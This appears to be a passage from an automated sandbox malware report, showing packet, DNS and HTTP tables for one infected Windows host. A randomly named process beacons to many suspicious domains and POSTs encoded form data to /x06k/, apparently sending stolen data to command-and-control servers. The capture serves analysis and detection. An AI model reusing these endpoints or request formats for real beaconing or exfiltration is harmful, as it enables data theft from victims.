Jul 27, 2024 08:08:24.762485027 CEST	80	62425	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:25.793661118 CEST	62426	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:25.799329042 CEST	80	62426	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:25.799411058 CEST	62426	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:25.824462891 CEST	62426	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:25.833626032 CEST	80	62426	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:26.323935032 CEST	80	62426	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:26.323992968 CEST	62426	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:27.338453054 CEST	62426	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:27.343496084 CEST	80	62426	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:28.377377033 CEST	62427	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:28.383229017 CEST	80	62427	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:28.383305073 CEST	62427	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:28.407743931 CEST	62427	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:28.412580967 CEST	80	62427	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:28.412808895 CEST	80	62427	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:28.862782001 CEST	80	62427	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:28.863600016 CEST	62427	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:29.932208061 CEST	62427	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:29.937727928 CEST	80	62427	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:30.961996078 CEST	62428	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:30.968074083 CEST	80	62428	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:30.968364000 CEST	62428	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:30.984030008 CEST	62428	80	192.168.2.6	3.33.130.190
Jul 27, 2024 08:08:30.989558935 CEST	80	62428	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:31.070908070 CEST	80	62428	3.33.130.190	192.168.2.6
Jul 27, 2024 08:08:36.700611115 CEST	62429	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:36.705673933 CEST	80	62429	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:36.708509922 CEST	62429	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:36.725028038 CEST	62429	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:36.730176926 CEST	80	62429	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:37.182348967 CEST	80	62429	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:37.182708025 CEST	80	62429	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:37.190433025 CEST	62429	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:38.226692915 CEST	62429	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:39.260510921 CEST	62430	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:39.268213034 CEST	80	62430	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:39.268517971 CEST	62430	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:39.282388926 CEST	80	62430	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:39.288521051 CEST	62430	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:39.292445898 CEST	62430	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:39.297420979 CEST	80	62430	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:41.842098951 CEST	62431	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:41.847210884 CEST	80	62431	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:41.847282887 CEST	62431	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:41.872615099 CEST	62431	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:41.877655983 CEST	80	62431	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:41.877724886 CEST	80	62431	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:42.334685087 CEST	80	62431	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:42.335218906 CEST	80	62431	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:42.335266113 CEST	62431	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:43.386449099 CEST	62431	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:44.417290926 CEST	62432	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:44.425512075 CEST	80	62432	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:44.425674915 CEST	62432	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:44.443260908 CEST	62432	80	192.168.2.6	172.191.244.62
Jul 27, 2024 08:08:44.449907064 CEST	80	62432	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:44.501974106 CEST	80	62432	172.191.244.62	192.168.2.6
Jul 27, 2024 08:08:49.586456060 CEST	62433	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:49.591655970 CEST	80	62433	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:49.598476887 CEST	62433	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:49.613475084 CEST	62433	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:49.618283033 CEST	80	62433	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:50.381589890 CEST	80	62433	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:50.381607056 CEST	80	62433	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:50.381656885 CEST	62433	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:51.118635893 CEST	62433	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:52.154164076 CEST	62434	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:52.160178900 CEST	80	62434	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:52.160257101 CEST	62434	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:52.185499907 CEST	62434	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:52.190738916 CEST	80	62434	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:52.945883989 CEST	80	62434	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:52.945899010 CEST	80	62434	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:52.946588039 CEST	62434	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:53.832516909 CEST	62434	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:54.862647057 CEST	62435	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:54.904153109 CEST	80	62435	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:54.904370070 CEST	62435	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:54.926457882 CEST	62435	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:54.940452099 CEST	80	62435	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:54.940530062 CEST	80	62435	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:55.276979923 CEST	80	62435	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:58.407870054 CEST	62436	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:58.412916899 CEST	80	62436	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:58.413043022 CEST	62436	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:58.428782940 CEST	62436	80	192.168.2.6	162.241.216.26
Jul 27, 2024 08:08:58.433629990 CEST	80	62436	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:59.190845966 CEST	80	62436	162.241.216.26	192.168.2.6
Jul 27, 2024 08:08:59.240516901 CEST	62436	80	192.168.2.6	162.241.216.26

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 08:05:26.092073917 CEST	53	52351	162.159.36.2	192.168.2.6
Jul 27, 2024 08:05:26.633584976 CEST	54272	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:05:26.640578032 CEST	53	54272	1.1.1.1	192.168.2.6
Jul 27, 2024 08:05:44.597609043 CEST	56748	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:05:44.614180088 CEST	53	56748	1.1.1.1	192.168.2.6
Jul 27, 2024 08:06:05.904048920 CEST	55258	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:06:05.918128967 CEST	53	55258	1.1.1.1	192.168.2.6
Jul 27, 2024 08:06:19.422522068 CEST	58955	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:06:20.195096970 CEST	53	58955	1.1.1.1	192.168.2.6
Jul 27, 2024 08:06:34.017888069 CEST	52308	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:06:34.438570023 CEST	53	52308	1.1.1.1	192.168.2.6
Jul 27, 2024 08:06:48.018902063 CEST	62646	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:06:48.107722044 CEST	53	62646	1.1.1.1	192.168.2.6
Jul 27, 2024 08:07:01.532759905 CEST	57028	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:07:01.567143917 CEST	53	57028	1.1.1.1	192.168.2.6
Jul 27, 2024 08:07:14.840516090 CEST	60766	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:07:14.852674007 CEST	53	60766	1.1.1.1	192.168.2.6
Jul 27, 2024 08:07:27.656506062 CEST	55620	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:07:27.818675041 CEST	53	55620	1.1.1.1	192.168.2.6
Jul 27, 2024 08:07:41.250866890 CEST	61119	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:07:41.451428890 CEST	53	61119	1.1.1.1	192.168.2.6
Jul 27, 2024 08:07:55.124540091 CEST	52105	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:07:55.703437090 CEST	53	52105	1.1.1.1	192.168.2.6
Jul 27, 2024 08:08:09.716404915 CEST	64102	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:08:09.763786077 CEST	53	64102	1.1.1.1	192.168.2.6
Jul 27, 2024 08:08:23.174448967 CEST	51088	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:08:23.209604979 CEST	53	51088	1.1.1.1	192.168.2.6
Jul 27, 2024 08:08:36.106203079 CEST	50096	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:08:36.689354897 CEST	53	50096	1.1.1.1	192.168.2.6
Jul 27, 2024 08:08:49.532454014 CEST	58618	53	192.168.2.6	1.1.1.1
Jul 27, 2024 08:08:49.575500965 CEST	53	58618	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 08:05:26.633584976 CEST	192.168.2.6	1.1.1.1	0x7094	Standard query (0)	206.23.85.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jul 27, 2024 08:05:44.597609043 CEST	192.168.2.6	1.1.1.1	0x7be	Standard query (0)	www.miquwawa.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:06:05.904048920 CEST	192.168.2.6	1.1.1.1	0x99f7	Standard query (0)	www.exporationgenius.sbs	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:06:19.422522068 CEST	192.168.2.6	1.1.1.1	0xe0a3	Standard query (0)	www.zocalo-fuk.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:06:34.017888069 CEST	192.168.2.6	1.1.1.1	0x45f2	Standard query (0)	www.tcfreal.top	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:06:48.018902063 CEST	192.168.2.6	1.1.1.1	0xc513	Standard query (0)	www.noghteyab.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:01.532759905 CEST	192.168.2.6	1.1.1.1	0xbd39	Standard query (0)	www.loangoatworld.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:14.840516090 CEST	192.168.2.6	1.1.1.1	0xcd66	Standard query (0)	www.forthelement.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:27.656506062 CEST	192.168.2.6	1.1.1.1	0x1ade	Standard query (0)	www.ngkwnq.xyz	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:41.250866890 CEST	192.168.2.6	1.1.1.1	0xde79	Standard query (0)	www.hermandadcoyotes.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:55.124540091 CEST	192.168.2.6	1.1.1.1	0xd71f	Standard query (0)	www.desakedungpeluk.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:08:09.716404915 CEST	192.168.2.6	1.1.1.1	0x64c2	Standard query (0)	www.michaelstutorgroup.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:08:23.174448967 CEST	192.168.2.6	1.1.1.1	0x71da	Standard query (0)	www.dkimhub.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:08:36.106203079 CEST	192.168.2.6	1.1.1.1	0x46a5	Standard query (0)	www.xyz-store.xyz	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:08:49.532454014 CEST	192.168.2.6	1.1.1.1	0x926e	Standard query (0)	www.artistcalculator.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 08:05:26.640578032 CEST	1.1.1.1	192.168.2.6	0x7094	Name error (3)	206.23.85.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jul 27, 2024 08:05:44.614180088 CEST	1.1.1.1	192.168.2.6	0x7be	No error (0)	www.miquwawa.com	miquwawa.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 08:05:44.614180088 CEST	1.1.1.1	192.168.2.6	0x7be	No error (0)	miquwawa.com		95.169.27.235	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:06:05.918128967 CEST	1.1.1.1	192.168.2.6	0x99f7	No error (0)	www.exporationgenius.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:06:05.918128967 CEST	1.1.1.1	192.168.2.6	0x99f7	No error (0)	www.exporationgenius.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:06:20.195096970 CEST	1.1.1.1	192.168.2.6	0xe0a3	No error (0)	www.zocalo-fuk.com		157.7.107.37	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:06:34.438570023 CEST	1.1.1.1	192.168.2.6	0x45f2	No error (0)	www.tcfreal.top		203.161.50.128	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:06:48.107722044 CEST	1.1.1.1	192.168.2.6	0xc513	No error (0)	www.noghteyab.com		51.89.93.192	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:01.567143917 CEST	1.1.1.1	192.168.2.6	0xbd39	No error (0)	www.loangoatworld.com	loangoatworld.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 08:07:01.567143917 CEST	1.1.1.1	192.168.2.6	0xbd39	No error (0)	loangoatworld.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:01.567143917 CEST	1.1.1.1	192.168.2.6	0xbd39	No error (0)	loangoatworld.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:14.852674007 CEST	1.1.1.1	192.168.2.6	0xcd66	No error (0)	www.forthelement.com	forthelement.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 08:07:14.852674007 CEST	1.1.1.1	192.168.2.6	0xcd66	No error (0)	forthelement.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:14.852674007 CEST	1.1.1.1	192.168.2.6	0xcd66	No error (0)	forthelement.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:27.818675041 CEST	1.1.1.1	192.168.2.6	0x1ade	No error (0)	www.ngkwnq.xyz		35.241.41.54	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:41.451428890 CEST	1.1.1.1	192.168.2.6	0xde79	No error (0)	www.hermandadcoyotes.com	hermandadcoyotes.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 08:07:41.451428890 CEST	1.1.1.1	192.168.2.6	0xde79	No error (0)	hermandadcoyotes.com		188.95.113.62	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:07:55.703437090 CEST	1.1.1.1	192.168.2.6	0xd71f	No error (0)	www.desakedungpeluk.com	desakedungpeluk.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 08:07:55.703437090 CEST	1.1.1.1	192.168.2.6	0xd71f	No error (0)	desakedungpeluk.com		202.52.146.180	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:08:09.763786077 CEST	1.1.1.1	192.168.2.6	0x64c2	No error (0)	www.michaelstutorgroup.com	www.michaelstutorgroup.com.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 08:08:09.763786077 CEST	1.1.1.1	192.168.2.6	0x64c2	No error (0)	www.michaelstutorgroup.com.cdn.hstgr.net		84.32.84.178	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:08:23.209604979 CEST	1.1.1.1	192.168.2.6	0x71da	No error (0)	www.dkimhub.com	dkimhub.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 08:08:23.209604979 CEST	1.1.1.1	192.168.2.6	0x71da	No error (0)	dkimhub.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:08:23.209604979 CEST	1.1.1.1	192.168.2.6	0x71da	No error (0)	dkimhub.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:08:36.689354897 CEST	1.1.1.1	192.168.2.6	0x46a5	No error (0)	www.xyz-store.xyz	redirect.3dns.box		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 08:08:36.689354897 CEST	1.1.1.1	192.168.2.6	0x46a5	No error (0)	redirect.3dns.box		172.191.244.62	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:08:49.575500965 CEST	1.1.1.1	192.168.2.6	0x926e	No error (0)	www.artistcalculator.com	artistcalculator.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 08:08:49.575500965 CEST	1.1.1.1	192.168.2.6	0x926e	No error (0)	artistcalculator.com		162.241.216.26	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.miquwawa.com

www.exporationgenius.sbs

www.zocalo-fuk.com

www.tcfreal.top

www.noghteyab.com

www.loangoatworld.com

www.forthelement.com

www.ngkwnq.xyz

www.hermandadcoyotes.com

www.desakedungpeluk.com

www.michaelstutorgroup.com

www.dkimhub.com

www.xyz-store.xyz

www.artistcalculator.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	62384	95.169.27.235	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:05:44.658690929 CEST	484	OUT	GET /tqql/?h20PB=Ilr0H&9Fjx=u0XZF227Y/r9f3hknYKw3A/OKyua8wzaE5MpTM9c21roNqnsj5Gisp9VcwCWuR5N2hVTeUiUKYj3c1cP+6QCcj3wzwE0gmMNT1PJlFHdnkMlbksrXDYRbbL33cvAUMoN8r+Pi3M= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.miquwawa.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:05:45.825368881 CEST	687	IN	HTTP/1.1 301 Moved Permanently x-dns-prefetch-control: on expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://miquwawa.com/tqql/?h20PB=Ilr0H&9Fjx=u0XZF227Y/r9f3hknYKw3A/OKyua8wzaE5MpTM9c21roNqnsj5Gisp9VcwCWuR5N2hVTeUiUKYj3c1cP+6QCcj3wzwE0gmMNT1PJlFHdnkMlbksrXDYRbbL33cvAUMoN8r+Pi3M= x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: 2a1_HTTP.404,2a1_HTTP.301,2a1_404,2a1_URL.8568d83147aefeb65884e25abb290c35,2a1_guest,2a1_ x-litespeed-cache: miss content-length: 0 date: Sat, 27 Jul 2024 06:05:45 GMT server: LiteSpeed connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	62385	188.114.97.3	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:05.948867083 CEST	768	OUT	POST /x06k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.exporationgenius.sbs Origin: http://www.exporationgenius.sbs Referer: http://www.exporationgenius.sbs/x06k/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 65 39 43 4e 50 6d 4c 78 45 4c 4d 45 54 5a 48 30 47 54 74 57 5a 32 39 6f 64 38 72 64 4f 62 48 4f 76 68 51 33 76 30 66 72 4f 53 34 42 47 68 62 49 2f 43 31 52 67 6c 62 43 74 68 54 6e 38 52 49 57 5a 32 4b 74 4b 58 78 44 34 31 4b 78 4b 54 75 53 42 4d 6c 72 58 59 32 75 6e 50 5a 62 70 6d 41 32 35 50 35 47 38 6f 4c 4d 77 33 6b 63 4d 72 30 69 2f 72 6b 6e 34 58 6c 6d 36 75 4d 73 31 39 4b 61 30 6f 2f 35 79 68 33 38 58 6f 6a 73 42 63 57 61 70 51 79 64 66 77 31 70 61 38 4b 50 38 68 32 35 34 62 73 43 59 74 32 44 68 4f 55 61 62 2f 6b 74 4c 64 72 34 61 44 50 37 45 7a 53 6e 48 69 4e 53 4b 6c 53 57 51 76 45 77 70 2b 71 72 Data Ascii: 9Fjx=e9CNPmLxELMETZH0GTtWZ29od8rdObHOvhQ3v0frOS4BGhbI/C1RglbCthTn8RIWZ2KtKXxD41KxKTuSBMlrXY2unPZbpmA25P5G8oLMw3kcMr0i/rkn4Xlm6uMs19Ka0o/5yh38XojsBcWapQydfw1pa8KP8h254bsCYt2DhOUab/ktLdr4aDP7EzSnHiNSKlSWQvEwp+qr
Jul 27, 2024 08:06:06.558952093 CEST	818	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:06 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TTnc5Xlhr8DoGpFhPEbE8Cq7bhrEbc5hZdJtsaiKJk1Tx7fP2%2FNmdF9wpewMjEE%2BmXFz1byR6xvdGfmu4WYMxQQ017Yt4oZfQvWz43dmXeAFnVV7%2F8IGHTYZnFMtMI%2Fr74auUWNSLsahf68%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a7109aba5727a-EWR Content-Encoding: gzip alt-svc: h2=":443"; ma=60 Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e cb 0e 82 30 14 44 f7 fd 8a 2b 7b b9 60 88 ab 9b 2e e4 11 49 10 89 29 0b 97 9a d6 94 88 14 69 f1 f1 f7 06 d8 b8 9d 39 73 32 b4 4a 8e b1 38 57 29 ec c5 a1 80 aa de 15 79 0c de 1a 31 4f 45 86 98 88 64 69 36 7e 80 98 96 1e 67 a4 dd a3 e5 a4 d5 45 72 46 ae 71 ad e2 51 10 41 69 1c 64 66 ec 24 e1 12 32 c2 19 a2 ab 91 df 69 17 f2 3f 46 87 9c 51 cf 85 56 30 a8 e7 a8 ac 53 12 ea 53 01 f8 09 b6 77 84 f7 c5 42 67 1c dc 26 1c 4c 07 4e 37 16 ac 1a 5e 6a f0 09 fb 49 3f 8b 09 e7 43 3f 00 00 00 ff ff e3 02 00 82 ac 65 79 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: baL0D+{`.I)i9s2J8W)y1OEdi6~gErFqQAidf$2i?FQV0SSwBg&LN7^jI?C?ey0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	62386	188.114.97.3	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:08.517040968 CEST	792	OUT	POST /x06k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.exporationgenius.sbs Origin: http://www.exporationgenius.sbs Referer: http://www.exporationgenius.sbs/x06k/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 65 39 43 4e 50 6d 4c 78 45 4c 4d 45 43 4b 66 30 45 30 35 57 49 47 39 70 42 73 72 64 55 72 48 4b 76 68 73 33 76 31 62 46 4f 41 4d 42 49 6b 33 49 2b 44 31 52 6c 6c 62 43 69 42 54 59 79 78 49 66 5a 32 47 6c 4b 53 5a 44 34 31 4f 78 4b 57 43 53 42 62 4a 6f 58 49 32 73 73 76 5a 6a 6e 47 41 32 35 50 35 47 38 70 37 6d 77 33 4d 63 4d 61 45 69 2b 4b 6b 6b 6b 48 6c 6c 71 4f 4d 73 78 39 4b 6b 30 6f 2f 4c 79 67 36 70 58 71 62 73 42 64 4b 61 74 52 79 63 47 67 31 72 48 4d 4c 65 38 54 4c 4c 67 74 39 32 59 76 54 68 36 2f 55 6d 58 70 6c 33 58 75 72 62 49 54 76 35 45 78 4b 56 48 43 4e 34 49 6c 71 57 43 34 49 58 6d 4b 50 49 59 6d 76 45 34 53 73 5a 4a 31 54 63 43 39 6a 41 67 54 54 31 73 67 3d 3d Data Ascii: 9Fjx=e9CNPmLxELMECKf0E05WIG9pBsrdUrHKvhs3v1bFOAMBIk3I+D1RllbCiBTYyxIfZ2GlKSZD41OxKWCSBbJoXI2ssvZjnGA25P5G8p7mw3McMaEi+KkkkHllqOMsx9Kk0o/Lyg6pXqbsBdKatRycGg1rHMLe8TLLgt92YvTh6/UmXpl3XurbITv5ExKVHCN4IlqWC4IXmKPIYmvE4SsZJ1TcC9jAgTT1sg==
Jul 27, 2024 08:06:09.128319979 CEST	828	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:09 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99PBLuOdq8VqU9PYz3BINCw3QQreUE9v26mkcl8Or%2B4%2F93nB%2FNWQKBskKnuhb16UTR2CpviJ2%2BfxxP16%2Fw%2Fwj58hG%2BajWLVePp1N%2BdkvB%2BO1gX4kyCAH21wQUFQwv8M970wM0IJKKeIDl70%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a7119beedc337-EWR Content-Encoding: gzip alt-svc: h2=":443"; ma=60 Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e cb 0e 82 30 14 44 f7 fd 8a 2b 7b b9 60 88 ab 9b 2e e4 11 49 10 89 29 0b 97 9a d6 94 88 14 69 f1 f1 f7 06 d8 b8 9d 39 73 32 b4 4a 8e b1 38 57 29 ec c5 a1 80 aa de 15 79 0c de 1a 31 4f 45 86 98 88 64 69 36 7e 80 98 96 1e 67 a4 dd a3 e5 a4 d5 45 72 46 ae 71 ad e2 51 10 41 69 1c 64 66 ec 24 e1 12 32 c2 19 a2 ab 91 df 69 17 f2 3f 46 87 9c 51 cf 85 56 30 a8 e7 a8 ac 53 12 ea 53 01 f8 09 b6 77 84 f7 c5 42 67 1c dc 26 1c 4c 07 4e 37 16 ac 1a 5e 6a f0 09 fb 49 3f 8b 09 e7 43 3f 00 00 00 ff ff e3 02 00 82 ac 65 79 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 